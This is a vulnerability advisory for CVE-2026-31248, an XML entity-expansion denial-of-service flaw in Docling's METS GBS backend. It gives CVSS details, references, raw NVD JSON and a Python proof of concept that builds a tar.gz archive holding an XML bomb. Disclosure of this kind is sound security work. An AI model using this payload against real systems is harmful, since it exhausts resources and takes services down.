CVE-2026-31248

Description

Docling's METS GBS backend is vulnerable to XML Entity Expansion (XXE) attacks thru 2.61.0. The backend extracts and validates XML files from .tar.gz archives using etree.fromstring() without disabling entity resolution. An attacker can craft a malicious XML file with nested entity definitions (XML Bomb) and package it into a .tar.gz archive. When processed by Docling, the exponential expansion of entities during XML parsing leads to excessive resource consumption, resulting in a denial of service (DoS) condition on the system running the Docling parser.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Docling <= 2.61.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import tarfile
import io

# Malicious XML payload (XML Bomb)
xml_payload = """<!DOCTYPE data [
  <!ELEMENT data (#ANY)>
  <!ENTITY a "1234567890">
  <!ENTITY b "&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;">
  <!ENTITY c "&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;">
  <!ENTITY d "&c;&c;&c;&c;&c;&c;&c;&c;&c;&c;">
]>
<data>&d;</data>
"""

# Create a tar.gz file containing the malicious XML
tar_buffer = io.BytesIO()
with tarfile.open(fileobj=tar_buffer, mode="w:gz") as tar:
    # Add XML file to archive
    info = tarfile.TarInfo(name="malicious.xml")
    info.size = len(xml_payload.encode())
    tar.addfile(info, io.BytesIO(xml_payload.encode()))

# Save the payload
with open("exploit.tar.gz", "wb") as f:
    f.write(tar_buffer.getvalue())

print("PoC generated: exploit.tar.gz")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-31248
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-31248
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-31248/
[4] VulDB https://vuldb.com/cve/CVE-2026-31248
[5] https://github.com/docling-project/docling
[6] https://www.notion.so/CVE-2026-31248-35d1e1393188818585b2ce3b9ce24686

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-31248", "sourceIdentifier": "[email protected]", "published": "2026-05-11T17:16:19.647", "lastModified": "2026-05-13T15:47:35.667", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Docling's METS GBS backend is vulnerable to XML Entity Expansion (XXE) attacks thru 2.61.0. The backend extracts and validates XML files from .tar.gz archives using etree.fromstring() without disabling entity resolution. An attacker can craft a malicious XML file with nested entity definitions (XML Bomb) and package it into a .tar.gz archive. When processed by Docling, the exponential expansion of entities during XML parsing leads to excessive resource consumption, resulting in a denial of service (DoS) condition on the system running the Docling parser."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-776"}]}], "references": [{"url": "https://github.com/docling-project/docling", "source": "[email protected]"}, {"url": "https://www.notion.so/CVE-2026-31248-35d1e1393188818585b2ce3b9ce24686", "source": "[email protected]"}]}}